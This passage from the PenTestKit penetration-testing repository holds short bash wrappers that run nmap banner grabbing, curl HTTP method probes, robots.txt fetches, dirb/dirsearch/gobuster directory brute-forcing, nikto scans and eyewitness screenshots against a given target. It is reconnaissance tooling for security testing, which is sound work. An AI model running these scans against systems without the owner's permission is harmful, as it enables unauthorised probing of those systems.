15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	nmap -sV --version-intensity 5 "$1" -p"$2"
27 | else
28 |     echo "Please provide a target host and a list of ports."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-script.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	nmap -sV --script=banner "$1" -p"$2"
27 | else
28 |     echo "Please provide a target host and a list of ports."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/banner-grabbing-wget-http.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	curl "$1" -q -S
27 | else
28 |     echo "Please provide a target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/curl-delete.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | # e.g. $1 == Accept header
26 | # e.g. $2 == Auth Cookie header
27 | # e.g. $3 == proxy (http://127.0.0.1:8080)
28 | # e.g. $4 == target url
29 | 
30 | if [ $# -eq 4 ]; then
31 | 	curl -X DELETE --header "$1" --header 'Accept-Language: en' --header "$2" -x "$3" --insecure --include "$4"
32 | else
33 |     echo "Please provide Accept header, content-type, authorization cookie, post data, proxy server and target url."
34 | fi
35 | 


--------------------------------------------------------------------------------
/web/curl-get.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | # e.g. $1 == Accept header
26 | # e.g. $2 == Auth Cookie header
27 | # e.g. $3 == proxy (http://127.0.0.1:8080)
28 | # e.g. $4 == target url
29 | 
30 | if [ $# -eq 4 ]; then
31 | 	curl -X GET --header "$1" --header 'Accept-Language: en' --header "$2" -x "$3" --insecure --include "$4"
32 | else
33 |     echo "Please provide Accept header, authorization cookie, proxy server and target url."
34 | fi
35 | 


--------------------------------------------------------------------------------
/web/curl-options-proxy.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | # e.g. $1 == proxy (http://127.0.0.1:8080)
26 | # e.g. $2 == target url
27 | 
28 | if [ $# -eq 2 ]; then
29 | 	curl -i -I -X OPTIONS -x "$1" --insecure "$2"
30 | else
31 |     echo "Please provide proxy server and target url."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/curl-options.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | # e.g. $1 == target url
26 | 
27 | if [ $# -eq 1 ]; then
28 | 	curl -i -I -X OPTIONS --insecure "$1"
29 | else
30 |     echo "Please provide a target host."
31 | fi
32 | 


--------------------------------------------------------------------------------
/web/curl-robots.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	curl -sSik $1://$2:$3/robots.txt -m 10 2>&1 | tee "$1_$2_$3_robots.txt"
27 | else
28 |     echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/curl-trace.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | # e.g. $1 == proxy (http://127.0.0.1:8080)
25 | # e.g. $2 == target url
26 | if [ $# -eq 1 ]; then
27 | 	curl -i -I -X TRACE --insecure "$1"
28 | else
29 |     echo "Please provide a target host."
30 | fi
31 | 


--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-big.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	LOGNAME="dirsearch_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	dirsearch -b -u $1 -t 16 -r -E -f -w /usr/share/seclists/Discovery/Web-Content/big.txt --plain-text-report=$LOGNAME
30 | else
31 |     echo "Please provide the target URL."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/dir-scanner-dirsearch-medium.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	LOGNAME="dirsearch_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	dirsearch -b -u $1 -t 16 -r -E -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --plain-text-report=$LOGNAME
30 | else
31 |     echo "Please provide the URL."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/dir-scanner-fine-tuned.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	LOGNAME="dirb_big_results_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -l -r -S -o $LOGNAME -f -N $3
30 | else
31 |     echo "Please provide the target url, a user agent string and an HTTP code to ignore."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/dir-scanner-gobuster.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2024 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	LOGNAME="gobuster_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 |  	gobuster dir -u $1 -w /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -e -k -o $LOGNAME
30 | else
31 |     echo "Please provide the target URL."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/dir-scanner-proxy.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	LOGNAME="dirb_big_results_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -l -r -S -o $LOGNAME -p $3:$4
30 | else
31 |     echo "Please provide the target url base, the user agent string and the proxy host and port."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/dir-scanner.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	LOGNAME="dirb_big_results_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -l -r -S -o $LOGNAME
30 | else
31 |     echo "Please provide the target url."
32 | fi
33 | 


--------------------------------------------------------------------------------
/web/eyewitness.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | 
26 | if [ $# -eq 3 ]; then
27 | 	eyewitness --web -f "$1" --threads 10 --max-retries 2 -d "$2" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.44" --no-prompt
28 | else
29 |     echo "Please provide a Line seperated file containing URLs to capture, a Directory name for report output and a User-Agent string."
30 | fi
31 | 


--------------------------------------------------------------------------------
/web/html-to-png-screenshot.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	wkhtmltoimage --format png $1://$2:$3/ "$1_$2_$3_screenshot.png"
27 | else
28 |     echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/lists/big.list:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maldevel/PenTestKit/45ab5a4e2f5ad007b5ac8832d35d03edb5a2cc27/web/lists/big.list


--------------------------------------------------------------------------------
/web/lists/common-content-types.list:
--------------------------------------------------------------------------------
 1 | application/javascript
 2 | application/json
 3 | application/x-www-form-urlencoded
 4 | application/pdf
 5 | application/xml
 6 | application/zip
 7 | audio/mpeg
 8 | audio/vorbis
 9 | multipart/form-data
10 | text/css
11 | text/html
12 | text/plain
13 | image/png
14 | image/jpeg
15 | image/gif
16 | 


--------------------------------------------------------------------------------
/web/nikto-scan-proxy.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 4 ]; then
26 | 	nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useproxy $4 2>&1 | tee "$1_$2_$3_nikto.txt"
27 | else
28 | 	echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the proxy server."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/nikto-scan-useragent-proxy.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 5 ]; then
26 | 	nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useragent $4 -useproxy $5 2>&1 | tee "$1_$2_$3_nikto.txt"
27 | else
28 |     echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port, the user agent string and the proxy server."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/nikto-scan-useragent.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 4 ]; then
26 | 	nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useragent $4 2>&1 | tee "$1_$2_$3_nikto.txt"
27 | else
28 |     echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the user agent string."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/nikto-scan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html 2>&1 | tee "$1_$2_$3_nikto.txt"
27 | else
28 |     echo "Please provide the target protocol scheme (http or https), target IP address or hostname and the target port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/nikto.md:
--------------------------------------------------------------------------------
 1 | ## Nikto
 2 | 
 3 | ### Scanning an HTTPS target using a HTTP proxy
 4 | 
 5 | * Edit nikto.conf
 6 | 
 7 | ```
 8 | nano /etc/nikto.conf
 9 | ```
10 | 
11 | * Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay```
12 | 
13 | ```
14 | nikto -host example.com -port <port> -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080
15 | ```
16 | 


--------------------------------------------------------------------------------
/web/robots-ssl.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	wget "https://$1/robots.txt" --no-check-certificate
27 | else
28 |     echo "Please provide target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/robots.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
